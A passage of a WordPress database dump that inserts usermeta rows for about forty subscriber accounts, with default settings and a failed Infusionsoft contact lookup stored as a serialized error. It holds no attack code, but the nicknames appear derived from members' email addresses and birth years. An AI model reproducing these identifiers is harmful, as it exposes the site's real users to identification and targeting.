(6083, 459, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6084, 459, 'cyb_user_level', '0'),
(6085, 459, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6086, 459, 'default_password_nag', '1'),
(6087, 460, 'nickname', 'johnyang282010'),
(6088, 460, 'first_name', ''),
(6089, 460, 'last_name', ''),
(6090, 460, 'description', ''),
(6091, 460, 'rich_editing', 'true'),
(6092, 460, 'comment_shortcuts', 'false'),
(6093, 460, 'admin_color', 'fresh'),
(6094, 460, 'use_ssl', '0'),
(6095, 460, 'show_admin_bar_front', 'true'),
(6096, 460, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6097, 460, 'cyb_user_level', '0'),
(6098, 460, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6099, 460, 'default_password_nag', '1'),
(6100, 461, 'nickname', 'fitz01111966'),
(6101, 461, 'first_name', ''),
(6102, 461, 'last_name', ''),
(6103, 461, 'description', ''),
(6104, 461, 'rich_editing', 'true'),
(6105, 461, 'comment_shortcuts', 'false'),
(6106, 461, 'admin_color', 'fresh'),
(6107, 461, 'use_ssl', '0'),
(6108, 461, 'show_admin_bar_front', 'true'),
(6109, 461, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6110, 461, 'cyb_user_level', '0'),
(6111, 461, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6112, 461, 'default_password_nag', '1'),
(6113, 462, 'nickname', 'aldrichbrad1989'),
(6114, 462, 'first_name', ''),
(6115, 462, 'last_name', ''),
(6116, 462, 'description', ''),
(6117, 462, 'rich_editing', 'true'),
(6118, 462, 'comment_shortcuts', 'false'),
(6119, 462, 'admin_color', 'fresh'),
(6120, 462, 'use_ssl', '0'),
(6121, 462, 'show_admin_bar_front', 'true'),
(6122, 462, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6123, 462, 'cyb_user_level', '0'),
(6124, 462, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6125, 462, 'default_password_nag', '1'),
(6126, 463, 'nickname', 'lonniev1985'),
(6127, 463, 'first_name', ''),
(6128, 463, 'last_name', ''),
(6129, 463, 'description', ''),
(6130, 463, 'rich_editing', 'true'),
(6131, 463, 'comment_shortcuts', 'false'),
(6132, 463, 'admin_color', 'fresh'),
(6133, 463, 'use_ssl', '0'),
(6134, 463, 'show_admin_bar_front', 'true'),
(6135, 463, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6136, 463, 'cyb_user_level', '0'),
(6137, 463, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6138, 463, 'default_password_nag', '1'),
(6139, 464, 'nickname', 'j71395g1970'),
(6140, 464, 'first_name', ''),
(6141, 464, 'last_name', ''),
(6142, 464, 'description', ''),
(6143, 464, 'rich_editing', 'true'),
(6144, 464, 'comment_shortcuts', 'false'),
(6145, 464, 'admin_color', 'fresh'),
(6146, 464, 'use_ssl', '0'),
(6147, 464, 'show_admin_bar_front', 'true'),
(6148, 464, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6149, 464, 'cyb_user_level', '0'),
(6150, 464, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6151, 464, 'default_password_nag', '1'),
(6152, 465, 'nickname', 'bocasandy1958'),
(6153, 465, 'first_name', ''),
(6154, 465, 'last_name', ''),
(6155, 465, 'description', ''),
(6156, 465, 'rich_editing', 'true'),
(6157, 465, 'comment_shortcuts', 'false'),
(6158, 465, 'admin_color', 'fresh'),
(6159, 465, 'use_ssl', '0'),
(6160, 465, 'show_admin_bar_front', 'true'),
(6161, 465, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6162, 465, 'cyb_user_level', '0'),
(6163, 465, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6164, 465, 'default_password_nag', '1'),
(6165, 466, 'nickname', 'samjanes1956'),
(6166, 466, 'first_name', ''),
(6167, 466, 'last_name', ''),
(6168, 466, 'description', ''),
(6169, 466, 'rich_editing', 'true'),
(6170, 466, 'comment_shortcuts', 'false'),
(6171, 466, 'admin_color', 'fresh'),
(6172, 466, 'use_ssl', '0'),
(6173, 466, 'show_admin_bar_front', 'true'),
(6174, 466, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6175, 466, 'cyb_user_level', '0'),
(6176, 466, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6177, 466, 'default_password_nag', '1'),
(6178, 467, 'nickname', 'lauren.cryan2009'),
(6179, 467, 'first_name', ''),
(6180, 467, 'last_name', ''),
(6181, 467, 'description', ''),
(6182, 467, 'rich_editing', 'true'),
(6183, 467, 'comment_shortcuts', 'false'),
(6184, 467, 'admin_color', 'fresh'),
(6185, 467, 'use_ssl', '0'),
(6186, 467, 'show_admin_bar_front', 'true'),
(6187, 467, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6188, 467, 'cyb_user_level', '0'),
(6189, 467, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6190, 467, 'default_password_nag', '1'),
(6191, 468, 'nickname', 'photo985092002'),
(6192, 468, 'first_name', ''),
(6193, 468, 'last_name', ''),
(6194, 468, 'description', ''),
(6195, 468, 'rich_editing', 'true'),
(6196, 468, 'comment_shortcuts', 'false'),
(6197, 468, 'admin_color', 'fresh'),
(6198, 468, 'use_ssl', '0'),
(6199, 468, 'show_admin_bar_front', 'true'),
(6200, 468, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6201, 468, 'cyb_user_level', '0'),
(6202, 468, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6203, 468, 'default_password_nag', '1'),
(6204, 469, 'nickname', 'briantruax1993'),
(6205, 469, 'first_name', ''),
(6206, 469, 'last_name', ''),
(6207, 469, 'description', ''),
(6208, 469, 'rich_editing', 'true'),
(6209, 469, 'comment_shortcuts', 'false'),
(6210, 469, 'admin_color', 'fresh'),
(6211, 469, 'use_ssl', '0'),
(6212, 469, 'show_admin_bar_front', 'true'),
(6213, 469, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6214, 469, 'cyb_user_level', '0'),
(6215, 469, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6216, 469, 'default_password_nag', '1'),
(6217, 470, 'nickname', 'bergerac9112007'),
(6218, 470, 'first_name', ''),
(6219, 470, 'last_name', ''),
(6220, 470, 'description', ''),
(6221, 470, 'rich_editing', 'true'),
(6222, 470, 'comment_shortcuts', 'false'),
(6223, 470, 'admin_color', 'fresh'),
(6224, 470, 'use_ssl', '0'),
(6225, 470, 'show_admin_bar_front', 'true'),
(6226, 470, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6227, 470, 'cyb_user_level', '0'),
(6228, 470, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6229, 470, 'default_password_nag', '1'),
(6230, 471, 'nickname', 'dcryderz111993'),
(6231, 471, 'first_name', ''),
(6232, 471, 'last_name', ''),
(6233, 471, 'description', ''),
(6234, 471, 'rich_editing', 'true'),
(6235, 471, 'comment_shortcuts', 'false'),
(6236, 471, 'admin_color', 'fresh'),
(6237, 471, 'use_ssl', '0'),
(6238, 471, 'show_admin_bar_front', 'true'),
(6239, 471, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6240, 471, 'cyb_user_level', '0'),
(6241, 471, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6242, 471, 'default_password_nag', '1'),
(6243, 472, 'nickname', 'acgrant041965'),
(6244, 472, 'first_name', ''),
(6245, 472, 'last_name', ''),
(6246, 472, 'description', ''),
(6247, 472, 'rich_editing', 'true'),
(6248, 472, 'comment_shortcuts', 'false'),
(6249, 472, 'admin_color', 'fresh'),
(6250, 472, 'use_ssl', '0'),
(6251, 472, 'show_admin_bar_front', 'true'),
(6252, 472, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6253, 472, 'cyb_user_level', '0'),
(6254, 472, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6255, 472, 'default_password_nag', '1'),
(6256, 473, 'nickname', 'carmelomufu1957'),
(6257, 473, 'first_name', ''),
(6258, 473, 'last_name', ''),
(6259, 473, 'description', ''),
(6260, 473, 'rich_editing', 'true'),
(6261, 473, 'comment_shortcuts', 'false'),
(6262, 473, 'admin_color', 'fresh'),
(6263, 473, 'use_ssl', '0'),
(6264, 473, 'show_admin_bar_front', 'true'),
(6265, 473, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6266, 473, 'cyb_user_level', '0'),
(6267, 473, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6268, 473, 'default_password_nag', '1'),
(6269, 474, 'nickname', '1994lt11957'),
(6270, 474, 'first_name', ''),
(6271, 474, 'last_name', ''),
(6272, 474, 'description', ''),
(6273, 474, 'rich_editing', 'true'),
(6274, 474, 'comment_shortcuts', 'false'),
(6275, 474, 'admin_color', 'fresh'),
(6276, 474, 'use_ssl', '0'),
(6277, 474, 'show_admin_bar_front', 'true'),
(6278, 474, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6279, 474, 'cyb_user_level', '0'),
(6280, 474, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6281, 474, 'default_password_nag', '1'),
(6282, 475, 'nickname', 'charlottepreston111967'),
(6283, 475, 'first_name', ''),
(6284, 475, 'last_name', ''),
(6285, 475, 'description', ''),
(6286, 475, 'rich_editing', 'true'),
(6287, 475, 'comment_shortcuts', 'false'),
(6288, 475, 'admin_color', 'fresh'),
(6289, 475, 'use_ssl', '0'),
(6290, 475, 'show_admin_bar_front', 'true'),
(6291, 475, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6292, 475, 'cyb_user_level', '0'),
(6293, 475, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6294, 475, 'default_password_nag', '1'),
(6295, 476, 'nickname', 'catherine1959'),
(6296, 476, 'first_name', ''),
(6297, 476, 'last_name', ''),
(6298, 476, 'description', ''),
(6299, 476, 'rich_editing', 'true'),
(6300, 476, 'comment_shortcuts', 'false'),
(6301, 476, 'admin_color', 'fresh'),
(6302, 476, 'use_ssl', '0'),
(6303, 476, 'show_admin_bar_front', 'true'),
(6304, 476, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6305, 476, 'cyb_user_level', '0'),
(6306, 476, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6307, 476, 'default_password_nag', '1'),
(6308, 477, 'nickname', 'abrown619891953'),
(6309, 477, 'first_name', ''),
(6310, 477, 'last_name', ''),
(6311, 477, 'description', ''),
(6312, 477, 'rich_editing', 'true'),
(6313, 477, 'comment_shortcuts', 'false'),
(6314, 477, 'admin_color', 'fresh'),
(6315, 477, 'use_ssl', '0'),
(6316, 477, 'show_admin_bar_front', 'true'),
(6317, 477, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6318, 477, 'cyb_user_level', '0'),
(6319, 477, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6320, 477, 'default_password_nag', '1'),
(6321, 478, 'nickname', 'tazpearson1982'),
(6322, 478, 'first_name', ''),
(6323, 478, 'last_name', ''),
(6324, 478, 'description', ''),
(6325, 478, 'rich_editing', 'true'),
(6326, 478, 'comment_shortcuts', 'false'),
(6327, 478, 'admin_color', 'fresh'),
(6328, 478, 'use_ssl', '0'),
(6329, 478, 'show_admin_bar_front', 'true'),
(6330, 478, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6331, 478, 'cyb_user_level', '0'),
(6332, 478, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6333, 478, 'default_password_nag', '1'),
(6334, 479, 'nickname', 'mehrabmalek1979'),
(6335, 479, 'first_name', ''),
(6336, 479, 'last_name', ''),
(6337, 479, 'description', ''),
(6338, 479, 'rich_editing', 'true'),
(6339, 479, 'comment_shortcuts', 'false'),
(6340, 479, 'admin_color', 'fresh'),
(6341, 479, 'use_ssl', '0'),
(6342, 479, 'show_admin_bar_front', 'true'),
(6343, 479, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6344, 479, 'cyb_user_level', '0'),
(6345, 479, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6346, 479, 'default_password_nag', '1'),
(6347, 480, 'nickname', 'office1989'),
(6348, 480, 'first_name', ''),
(6349, 480, 'last_name', ''),
(6350, 480, 'description', ''),
(6351, 480, 'rich_editing', 'true'),
(6352, 480, 'comment_shortcuts', 'false'),
(6353, 480, 'admin_color', 'fresh'),
(6354, 480, 'use_ssl', '0'),
(6355, 480, 'show_admin_bar_front', 'true'),
(6356, 480, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6357, 480, 'cyb_user_level', '0'),
(6358, 480, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6359, 480, 'default_password_nag', '1'),
(6360, 481, 'nickname', 'saowarat.opasayanont1960'),
(6361, 481, 'first_name', ''),
(6362, 481, 'last_name', ''),
(6363, 481, 'description', ''),
(6364, 481, 'rich_editing', 'true'),
(6365, 481, 'comment_shortcuts', 'false'),
(6366, 481, 'admin_color', 'fresh'),
(6367, 481, 'use_ssl', '0'),
(6368, 481, 'show_admin_bar_front', 'true'),
(6369, 481, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6370, 481, 'cyb_user_level', '0'),
(6371, 481, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6372, 481, 'default_password_nag', '1'),
(6373, 482, 'nickname', 'jrenken1994'),
(6374, 482, 'first_name', ''),
(6375, 482, 'last_name', ''),
(6376, 482, 'description', ''),
(6377, 482, 'rich_editing', 'true'),
(6378, 482, 'comment_shortcuts', 'false'),
(6379, 482, 'admin_color', 'fresh'),
(6380, 482, 'use_ssl', '0'),
(6381, 482, 'show_admin_bar_front', 'true'),
(6382, 482, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6383, 482, 'cyb_user_level', '0'),
(6384, 482, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6385, 482, 'default_password_nag', '1'),
(6386, 483, 'nickname', 'sdm31081987'),
(6387, 483, 'first_name', ''),
(6388, 483, 'last_name', ''),
(6389, 483, 'description', ''),
(6390, 483, 'rich_editing', 'true'),
(6391, 483, 'comment_shortcuts', 'false'),
(6392, 483, 'admin_color', 'fresh'),
(6393, 483, 'use_ssl', '0'),
(6394, 483, 'show_admin_bar_front', 'true'),
(6395, 483, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6396, 483, 'cyb_user_level', '0'),
(6397, 483, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6398, 483, 'default_password_nag', '1'),
(6399, 484, 'nickname', 'southernspeed8042006'),
(6400, 484, 'first_name', ''),
(6401, 484, 'last_name', ''),
(6402, 484, 'description', ''),
(6403, 484, 'rich_editing', 'true'),
(6404, 484, 'comment_shortcuts', 'false'),
(6405, 484, 'admin_color', 'fresh'),
(6406, 484, 'use_ssl', '0'),
(6407, 484, 'show_admin_bar_front', 'true'),
(6408, 484, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6409, 484, 'cyb_user_level', '0'),
(6410, 484, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6411, 484, 'default_password_nag', '1'),
(6412, 485, 'nickname', 'dilysl2002'),
(6413, 485, 'first_name', ''),
(6414, 485, 'last_name', ''),
(6415, 485, 'description', ''),
(6416, 485, 'rich_editing', 'true'),
(6417, 485, 'comment_shortcuts', 'false'),
(6418, 485, 'admin_color', 'fresh'),
(6419, 485, 'use_ssl', '0'),
(6420, 485, 'show_admin_bar_front', 'true'),
(6421, 485, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6422, 485, 'cyb_user_level', '0'),
(6423, 485, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6424, 485, 'default_password_nag', '1'),
(6425, 486, 'nickname', 'jamesjeady2009'),
(6426, 486, 'first_name', ''),
(6427, 486, 'last_name', ''),
(6428, 486, 'description', ''),
(6429, 486, 'rich_editing', 'true'),
(6430, 486, 'comment_shortcuts', 'false'),
(6431, 486, 'admin_color', 'fresh'),
(6432, 486, 'use_ssl', '0'),
(6433, 486, 'show_admin_bar_front', 'true'),
(6434, 486, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6435, 486, 'cyb_user_level', '0'),
(6436, 486, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6437, 486, 'default_password_nag', '1'),
(6438, 487, 'nickname', 'john.serafin1999'),
(6439, 487, 'first_name', ''),
(6440, 487, 'last_name', ''),
(6441, 487, 'description', ''),
(6442, 487, 'rich_editing', 'true'),
(6443, 487, 'comment_shortcuts', 'false'),
(6444, 487, 'admin_color', 'fresh'),
(6445, 487, 'use_ssl', '0'),
(6446, 487, 'show_admin_bar_front', 'true'),
(6447, 487, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6448, 487, 'cyb_user_level', '0'),
(6449, 487, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6450, 487, 'default_password_nag', '1'),
(6461, 488, 'cyb_user_level', '0'),
(6462, 488, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6463, 488, 'default_password_nag', '1'),
(6464, 489, 'nickname', 'mjwilk441963'),
(6465, 489, 'first_name', ''),
(6466, 489, 'last_name', ''),
(6467, 489, 'description', ''),
(6468, 489, 'rich_editing', 'true'),
(6469, 489, 'comment_shortcuts', 'false'),
(6470, 489, 'admin_color', 'fresh'),
(6471, 489, 'use_ssl', '0'),
(6472, 489, 'show_admin_bar_front', 'true'),
(6473, 489, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6474, 489, 'cyb_user_level', '0'),
(6475, 489, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6476, 489, 'default_password_nag', '1'),
(6477, 490, 'nickname', 'ahallack232009'),
(6478, 490, 'first_name', ''),
(6479, 490, 'last_name', ''),
(6480, 490, 'description', ''),
(6481, 490, 'rich_editing', 'true'),
(6482, 490, 'comment_shortcuts', 'false'),
(6483, 490, 'admin_color', 'fresh'),
(6484, 490, 'use_ssl', '0');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(6485, 490, 'show_admin_bar_front', 'true'),
(6486, 490, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6487, 490, 'cyb_user_level', '0'),
(6488, 490, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6489, 490, 'default_password_nag', '1'),
(6490, 491, 'nickname', 'beverlymj1972'),
(6491, 491, 'first_name', ''),
(6492, 491, 'last_name', ''),
(6493, 491, 'description', ''),
(6494, 491, 'rich_editing', 'true'),
(6495, 491, 'comment_shortcuts', 'false'),
(6496, 491, 'admin_color', 'fresh'),
(6497, 491, 'use_ssl', '0'),
(6498, 491, 'show_admin_bar_front', 'true'),
(6499, 491, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6500, 491, 'cyb_user_level', '0'),
(6501, 491, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6502, 491, 'default_password_nag', '1'),
(6515, 492, 'default_password_nag', '1'),
(6516, 493, 'nickname', 'mdbunk922010'),
(6517, 493, 'first_name', ''),
(6518, 493, 'last_name', ''),
(6519, 493, 'description', ''),
(6520, 493, 'rich_editing', 'true'),
(6521, 493, 'comment_shortcuts', 'false'),
(6522, 493, 'admin_color', 'fresh'),
(6523, 493, 'use_ssl', '0'),
(6524, 493, 'show_admin_bar_front', 'true'),
(6525, 493, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6526, 493, 'cyb_user_level', '0'),
(6527, 493, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6528, 493, 'default_password_nag', '1'),
(6539, 494, 'cyb_user_level', '0'),
(6540, 494, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6541, 494, 'default_password_nag', '1'),
(6547, 495, 'comment_shortcuts', 'false'),
(6548, 495, 'admin_color', 'fresh'),
(6549, 495, 'use_ssl', '0'),
(6550, 495, 'show_admin_bar_front', 'true'),
(6551, 495, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6552, 495, 'cyb_user_level', '0'),
(6553, 495, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6554, 495, 'default_password_nag', '1'),
(6565, 496, 'cyb_user_level', '0'),
(6566, 496, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6567, 496, 'default_password_nag', '1'),
(6568, 497, 'nickname', 'curry1kg1974'),
(6569, 497, 'first_name', ''),
(6570, 497, 'last_name', ''),
(6571, 497, 'description', ''),
(6572, 497, 'rich_editing', 'true'),
(6573, 497, 'comment_shortcuts', 'false'),
(6574, 497, 'admin_color', 'fresh'),
(6575, 497, 'use_ssl', '0'),
(6576, 497, 'show_admin_bar_front', 'true'),
(6577, 497, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6578, 497, 'cyb_user_level', '0'),
(6579, 497, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6580, 497, 'default_password_nag', '1'),
(6581, 498, 'nickname', 'amtturnip1962'),
(6582, 498, 'first_name', ''),
(6583, 498, 'last_name', ''),
(6584, 498, 'description', ''),
(6585, 498, 'rich_editing', 'true'),
(6586, 498, 'comment_shortcuts', 'false'),
(6587, 498, 'admin_color', 'fresh'),
(6588, 498, 'use_ssl', '0'),
(6589, 498, 'show_admin_bar_front', 'true'),
(6590, 498, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6591, 498, 'cyb_user_level', '0'),
(6592, 498, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6593, 498, 'default_password_nag', '1'),
(6604, 499, 'cyb_user_level', '0'),
(6605, 499, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6606, 499, 'default_password_nag', '1'),
(6607, 500, 'nickname', 'sam1967'),
(6608, 500, 'first_name', ''),
(6609, 500, 'last_name', ''),
(6610, 500, 'description', ''),
(6611, 500, 'rich_editing', 'true'),
(6612, 500, 'comment_shortcuts', 'false'),
(6613, 500, 'admin_color', 'fresh'),
(6614, 500, 'use_ssl', '0'),
(6615, 500, 'show_admin_bar_front', 'true'),
(6616, 500, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6617, 500, 'cyb_user_level', '0'),
(6618, 500, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6619, 500, 'default_password_nag', '1'),
(6620, 501, 'nickname', 'aswan1973'),
(6621, 501, 'first_name', ''),
(6622, 501, 'last_name', ''),
(6623, 501, 'description', ''),
(6624, 501, 'rich_editing', 'true'),
(6625, 501, 'comment_shortcuts', 'false'),
(6626, 501, 'admin_color', 'fresh'),
(6627, 501, 'use_ssl', '0'),
(6628, 501, 'show_admin_bar_front', 'true'),
(6629, 501, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6630, 501, 'cyb_user_level', '0'),
(6631, 501, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6632, 501, 'default_password_nag', '1'),
(6633, 502, 'nickname', 'folsom971952'),
(6634, 502, 'first_name', ''),
